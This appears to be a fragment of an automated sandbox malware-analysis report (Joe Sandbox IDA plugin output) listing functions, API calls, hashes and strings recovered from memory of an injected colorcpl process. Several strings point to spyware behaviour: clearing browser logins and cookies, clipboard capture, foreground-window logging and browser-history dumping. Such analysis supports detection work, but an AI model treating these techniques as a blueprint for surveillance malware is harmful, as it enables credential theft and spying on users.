                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 639d498412cf33c24e726577eee591a45ae2cbc755cd04bb00a0055bf5d889cf
                                        • Instruction ID: 63b618b4c682267e5952740b99000dc4daad289d0383b3513de562927e142c29
                                        • Opcode Fuzzy Hash: 639d498412cf33c24e726577eee591a45ae2cbc755cd04bb00a0055bf5d889cf
                                        • Instruction Fuzzy Hash: A8411731A04104AAFF256FB88D44BAE3BB8EF45374F148619FC5A9A1D0EB75B80147A3
                                        Function 04ABFD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cec0077d3af0e3b03516113666257c2941891a8e95e2cf3d2a5e33310dc377b0
                                        • Instruction ID: c2079dea0017980bbe3c694c99939763e151386cc87203d26604167467433ddf
                                        • Opcode Fuzzy Hash: cec0077d3af0e3b03516113666257c2941891a8e95e2cf3d2a5e33310dc377b0
                                        • Instruction Fuzzy Hash: 464108B1A00704AFE7259F78CD40BEABBADEB88718F14852EF181DB282D371B51187D0
                                        Function 06910AC6 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                        • Instruction ID: de5be19e2c3bc9b10d72c8a5a2868b77894ed674dbd92e40d1891c59a7eba346
                                        • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                        • Instruction Fuzzy Hash: 7A410B71A40708AFE7A4DF78CC40B5EBBA9EB84710F20852AE155DFA80DA729951C790
                                        Function 04A84CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,04AF1EE8), ref: 04A84D93
                                        • CreateThread.KERNEL32(00000000,00000000,?,04AF1E90,00000000,00000000), ref: 04A84DA7
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 04A84DB2
                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 04A84DBB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3360349984-0
                                        • Opcode ID: b10f8c46a8dc1d63bad47b0a0bfa7fd5778b11f2233f4d8eaf0600e610e77a5b
                                        • Instruction ID: e47a18347b69e31db13404924fe13f49ef6887975ff1585f2fc53a234a3e1f42
                                        • Opcode Fuzzy Hash: b10f8c46a8dc1d63bad47b0a0bfa7fd5778b11f2233f4d8eaf0600e610e77a5b
                                        • Instruction Fuzzy Hash: EC417171609301AFDB15BB64CE54D7FB7EDEF94214F400A1EB886822D1EB24AD0A8661
                                        Function 04A8AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • Cleared browsers logins and cookies., xrefs: 04A8B036
                                        • [Cleared browsers logins and cookies.], xrefs: 04A8B025
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                        • API String ID: 3472027048-1236744412
                                        • Opcode ID: 7c9eb1b7527023f1b6a58e1757fe07957dcbb2ffc23a6c6de7d596391285d10b
                                        • Instruction ID: fccde60b53684d1fbb5bb53a1f4c0c8a2edefc67d3dae7954a4d4ff629e8e82a
                                        • Opcode Fuzzy Hash: 7c9eb1b7527023f1b6a58e1757fe07957dcbb2ffc23a6c6de7d596391285d10b
                                        • Instruction Fuzzy Hash: 9231BE4524C3807EFA11BBB955257BA7B92CF93648F08848EE8D40F2C3D9537C099763
                                        Function 04A894FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04A9A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04A9A2EB
                                          • Part of subcall function 04A9A2DB: GetWindowTextLengthW.USER32(00000000), ref: 04A9A2F4
                                          • Part of subcall function 04A9A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 04A9A31E
                                        • Sleep.KERNEL32(000001F4), ref: 04A8955A
                                        • Sleep.KERNEL32(00000064), ref: 04A895F5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$ForegroundLength
                                        • String ID: [ $ ]
                                        • API String ID: 3309952895-93608704
                                        • Opcode ID: 2a7c06c19bfa4d012627eb0eff4412084dc92df5511d147342fefc8d7d59ea7d
                                        • Instruction ID: 5bccb55d973fd83cacfeee1d9130d327ea5f170a51f4b7c9ab5887cd35bc653b
                                        • Opcode Fuzzy Hash: 2a7c06c19bfa4d012627eb0eff4412084dc92df5511d147342fefc8d7d59ea7d
                                        • Instruction Fuzzy Hash: 8F21AC71A043046BF608B7B4DE16EBF37A8EF55608F40051DE5526B1C1FE25BE0A8692
                                        Function 04AC0F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9cbda176e79e4a1969a8edaf76b37e6f19881ae497a48785cf98288bb422fcca
                                        • Instruction ID: 1f38df22a8e0a5566011bbb850eca944e742fc6e84e2cff7107be1fa621a891f
                                        • Opcode Fuzzy Hash: 9cbda176e79e4a1969a8edaf76b37e6f19881ae497a48785cf98288bb422fcca
                                        • Instruction Fuzzy Hash: BA01A7B260D316BEFAA01AB86CC0F6B261CDB413B8B21832DF566651C1EF64AC5142A0
                                        Function 04AC0FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3f34544b31c6e8126c2f1431f0437ae229165c3f6352d22cfc24f2478267067
                                        • Instruction ID: 5d3a47804882fab28b8b1652b94004818a3fe088a34c1350dec979285f589743
                                        • Opcode Fuzzy Hash: a3f34544b31c6e8126c2f1431f0437ae229165c3f6352d22cfc24f2478267067
                                        • Instruction Fuzzy Hash: D401D6B270E3267EB7A01A786CC4D27231DDF513B8335432DF522551D6EB38AC455A60
                                        Function 04A8966D Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,04A89745), ref: 04A896A3
                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,04A89745), ref: 04A896B2
                                        • Sleep.KERNEL32(00002710,?,?,?,04A89745), ref: 04A896DF
                                        • CloseHandle.KERNEL32(00000000,?,?,?,04A89745), ref: 04A896E6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSizeSleep
                                        • String ID:
                                        • API String ID: 1958988193-0
                                        • Opcode ID: 3c51ba0807bf5b0acf76ca0158bf459cfe3046fc6a11d8dd2f00c54d6e5faf88
                                        • Instruction ID: aa3731c0a135602e43b4c8baf9b0b2edbd236cd6f7b25db90f2d75e363c7d1b8
                                        • Opcode Fuzzy Hash: 3c51ba0807bf5b0acf76ca0158bf459cfe3046fc6a11d8dd2f00c54d6e5faf88
                                        • Instruction Fuzzy Hash: E51106B26012806BF735BF749998B3F3BAFEB56304F04045CE28286581D7697C56C326
                                        Function 04AC5A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,04AC5A3C,00000000,00000000,00000000,00000000,?,04AC5D68,00000006,FlsSetValue), ref: 04AC5AC7
                                        • GetLastError.KERNEL32(?,04AC5A3C,00000000,00000000,00000000,00000000,?,04AC5D68,00000006,FlsSetValue,04ADC110,04ADC118,00000000,00000364,?,04AC57F7), ref: 04AC5AD3
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,04AC5A3C,00000000,00000000,00000000,00000000,?,04AC5D68,00000006,FlsSetValue,04ADC110,04ADC118,00000000), ref: 04AC5AE1
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 0a3843842e15d8fd599525161434d1e3ed2f8c360ce50c0be8f31b77ec40c240
                                        • Instruction ID: 6426559c43150a2fe05da35400bd9e820da49d909f0ab1e7fe58858ce23bd80c
                                        • Opcode Fuzzy Hash: 0a3843842e15d8fd599525161434d1e3ed2f8c360ce50c0be8f31b77ec40c240
                                        • Instruction Fuzzy Hash: 0501D432B03236BBC7614A6AAC88A567BA8EB597607514628F917D7140E724F801C6E0
                                        Function 04A9A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,04A8983B), ref: 04A9A228
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 04A9A23C
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 04A9A261
                                        • CloseHandle.KERNEL32(00000000), ref: 04A9A26F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 3919263394-0
                                        • Opcode ID: be920f139b709d6c889a00de7093cf58996b4afc0d4e4158581e37720ad82192
                                        • Instruction ID: c828255440dd8bf3219f281cf6c76b78e8ca82f7c53c00c63f2820c406e5a1ed
                                        • Opcode Fuzzy Hash: be920f139b709d6c889a00de7093cf58996b4afc0d4e4158581e37720ad82192
                                        • Instruction Fuzzy Hash: 95F096B53472187FFA152F25AC84FBF37ECDB876A8F00022EF902A61C0DA265D065531
                                        Function 04AB7603 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 04AB761A
                                          • Part of subcall function 04AB7C52: ___AdjustPointer.LIBCMT ref: 04AB7C9C
                                        • _UnwindNestedFrames.LIBCMT ref: 04AB7631
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 04AB7643
                                        • CallCatchBlock.LIBVCRUNTIME ref: 04AB7667
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID:
                                        • API String ID: 2633735394-0
                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                        • Instruction ID: 47d3f0fc5a0a7afd32e2add1c9b40f2e19425a67e6f79c7568c02e4fd1c264de
                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                        • Instruction Fuzzy Hash: 22012936000108BBDF126F59CD41EEA7BBAFF88754F054014F99861121D7B6E861EBE4
                                        Function 069083C8 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 069083DF
                                          • Part of subcall function 06908A17: ___AdjustPointer.LIBCMT ref: 06908A61
                                        • _UnwindNestedFrames.LIBCMT ref: 069083F6
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 06908408
                                        • CallCatchBlock.LIBVCRUNTIME ref: 0690842C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID:
                                        • API String ID: 2633735394-0
                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                        • Instruction ID: 576e495368b999d14472257a1bb706705dfe0d0ee7f8130f9b7987d45ccd0315
                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                        • Instruction Fuzzy Hash: 2E011B32500109FFEF929F55CD00EEA3B7AFF88754F154014F92866560D736E861DBA0
                                        Function 04A9739D Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemMetrics.USER32(0000004C), ref: 04A973AA
                                        • GetSystemMetrics.USER32(0000004D), ref: 04A973B0
                                        • GetSystemMetrics.USER32(0000004E), ref: 04A973B6
                                        • GetSystemMetrics.USER32(0000004F), ref: 04A973BC
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID:
                                        • API String ID: 4116985748-0
                                        • Opcode ID: caa31f305f4a47e4a8fd6a3797eb1a31bbbd0b84c8aff3da3bef11868cb69f53
                                        • Instruction ID: 220b1f11791a80097fabf2691b0ed40f035816179454aa8932307583f7df2745
                                        • Opcode Fuzzy Hash: caa31f305f4a47e4a8fd6a3797eb1a31bbbd0b84c8aff3da3bef11868cb69f53
                                        • Instruction Fuzzy Hash: 7EF04FA1B043159FEB01EE798854A2F6AD59FD4264F10443EE60987281EEB8EC058BA1
                                        Function 04AB6CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 04AB6CD1
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 04AB6CD6
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 04AB6CDB
                                          • Part of subcall function 04AB81DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 04AB81EB
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 04AB6CF0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                        • Instruction ID: 1056771bdc467aacfd1e643e89ba1a9e77392725a95f2c5110c8b3eb76ab087b
                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                        • Instruction Fuzzy Hash: 4FC04C54042541543D527BB873002ED135CAF571CCBE514CE8CD117107990E700AA5F3
                                        Function 06907A96 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 06907A96
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 06907A9B
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 06907AA0
                                          • Part of subcall function 06908F9F: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 06908FB0
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 06907AB5
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                        • Instruction ID: 04f11ba2e861d8ffd8117a8fcc690d0f13efe2e2ff3f4199363792637b1f2fd4
                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                        • Instruction Fuzzy Hash: 21C002046602116C3CD0BAF46F141AE234A08D22B4BA018818AA55ADC26A25A24A62B2
                                        Function 068D9153 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 293COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 068D9158
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 068D91F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception@8H_prologThrow
                                        • String ID: OE
                                        • API String ID: 3222999186-2506519113
                                        • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                        • Instruction ID: 4af0f9fc97e4d607f501fa9fe3148e8cc28b0991e3655ec6a702a95dd7fd2722
                                        • Opcode Fuzzy Hash: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                                        • Instruction Fuzzy Hash: 8DB15C729002189BCF94FB68DC91AFD7779AF14310F50416AE926E71D0EF345B49CBA2
                                        Function 068D643F Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 278COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 068D648B
                                        • __Init_thread_footer.LIBCMT ref: 068D64C8
                                          • Part of subcall function 069032EA: __onexit.LIBCMT ref: 069032F0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer$__onexit
                                        • String ID: T0F
                                        • API String ID: 1878262506-3557657896
                                        • Opcode ID: b6c899d7c6c0fcbed3c99814d4168f8b86fa6ee7e5bb51afa62db24501b00f46
                                        • Instruction ID: 9d7d529880b0735eb6b4478e443da0137b6fef6c6ba84610ef6a2e1ed3565eb0
                                        • Opcode Fuzzy Hash: b6c899d7c6c0fcbed3c99814d4168f8b86fa6ee7e5bb51afa62db24501b00f46
                                        • Instruction Fuzzy Hash: 40911A31600208AFD7D0FF28AC50D2E3769EB40701F40443EF659D32A2EB65AE48977B
                                        Function 069138F2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __freea
                                        • String ID: H"G$H"GH"G
                                        • API String ID: 240046367-3036711414
                                        • Opcode ID: 85d5c5bb78c3dc120d65423bccd5b238d1fe586f27ad34d61dd2e41aacc264b2
                                        • Instruction ID: a12036a15f9f624fe7d2f47353189a0f41a95d488880772bc7bad2d83bdcd2b2
                                        • Opcode Fuzzy Hash: 85d5c5bb78c3dc120d65423bccd5b238d1fe586f27ad34d61dd2e41aacc264b2
                                        • Instruction Fuzzy Hash: 7F41EB72A00216EFEBE0DF64CC80A5E77F89F85760B354559E829CFA94EB30D840C791
                                        Function 04A8402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 04A84046
                                          • Part of subcall function 04A99959: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,04AE9654,04A8BDCB,.vbs,?,?,?,?,?,04AF2200), ref: 04A99980
                                          • Part of subcall function 04A968A6: CloseHandle.KERNEL32(04A840D5,?,?,04A840D5,04AE2E24), ref: 04A968BC
                                          • Part of subcall function 04A968A6: CloseHandle.KERNEL32(04AE2E24,?,?,04A840D5,04AE2E24), ref: 04A968C5
                                          • Part of subcall function 04A9A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,04A8983B), ref: 04A9A228
                                        • Sleep.KERNEL32(000000FA,04AE2E24), ref: 04A84118
                                        Strings
                                        • /sort "Visit Time" /stext ", xrefs: 04A84092
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                        • String ID: /sort "Visit Time" /stext "
                                        • API String ID: 368326130-1573945896
                                        • Opcode ID: fd053eaf05bf955698007c81d3e20458da686aca19bf226b61c3d477dd8a341e
                                        • Instruction ID: d04e706929cdc438e391e9e24eece71e0f16cc01de7635b6cae04ca8ebe49388
                                        • Opcode Fuzzy Hash: fd053eaf05bf955698007c81d3e20458da686aca19bf226b61c3d477dd8a341e
                                        • Instruction Fuzzy Hash: D6313E32A002195BEB18FBE5DE95DFE77B9EF94208F40016DE506A7190EE307D4ACA91
                                        Function 0691CEFD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 91COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 069164EA: _free.LIBCMT ref: 06916521
                                          • Part of subcall function 069164EA: _abort.LIBCMT ref: 06916568
                                          • Part of subcall function 0691D01C: _abort.LIBCMT ref: 0691D04E
                                          • Part of subcall function 0691D01C: _free.LIBCMT ref: 0691D082
                                        • _free.LIBCMT ref: 0691CF75
                                        • _free.LIBCMT ref: 0691CFAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _free$_abort
                                        • String ID: pF
                                        • API String ID: 195396716-2973420481
                                        • Opcode ID: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
                                        • Instruction ID: 065468390c55d4423ac6688cf337ab6a3869d665d674d7204db7babcfc03f7d3
                                        • Opcode Fuzzy Hash: 97d7db50b82cccbee5169bb68c5bf7844dd74d9bc7eda6e9766878cece535fa3
                                        • Instruction Fuzzy Hash: 8E31C43190420CEFDB90DBA9D94076DBBE4DF81320F314099E5349F690EB369D41DB50
                                        Function 04A8A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 04AB2525: __onexit.LIBCMT ref: 04AB252B
                                        • __Init_thread_footer.LIBCMT ref: 04A8A6E3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer__onexit
                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                        • API String ID: 1881088180-3686566968
                                        • Opcode ID: c2586150c30f3be211733270e9c9c771f914b1aa981b0c12b0a46f3beac5f290
                                        • Instruction ID: 20764c35591319281005b190041dd8d68ce71f19b573c0a9b498715eb4ece7e9
                                        • Opcode Fuzzy Hash: c2586150c30f3be211733270e9c9c771f914b1aa981b0c12b0a46f3beac5f290
                                        • Instruction Fuzzy Hash: 27218F719101095BEB04FBE4DAA1DFEB379EF54218F50016ED506A7291EF20BE4BCB90
                                        Function 04ACED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,04ACEF72,?,00000050,?,?,?,?,?), ref: 04ACEDF2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570583645.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_4a80000_colorcpl.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ACP$OCP
                                        • API String ID: 0-711371036
                                        • Opcode ID: a3d69dd00f8ba6ba082be18261c31c23e755a412071c29ebcea2fa060d5471cc
                                        • Instruction ID: 355b65bbac1e05608b2ecb42fc4d958d1b36e562cfa07a50a4d800606e452239
                                        • Opcode Fuzzy Hash: a3d69dd00f8ba6ba082be18261c31c23e755a412071c29ebcea2fa060d5471cc
                                        • Instruction Fuzzy Hash: 54218376B40201A6EBB68F54CD05BA773ABEF54B90F46456CE91AD7104FB32F941C350
                                        Function 0690B17A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                        Download Yara Rule
                                        APIs
                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 0690B23F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.4570762344.00000000068D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 068D0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_68d0000_colorcpl.jbxd
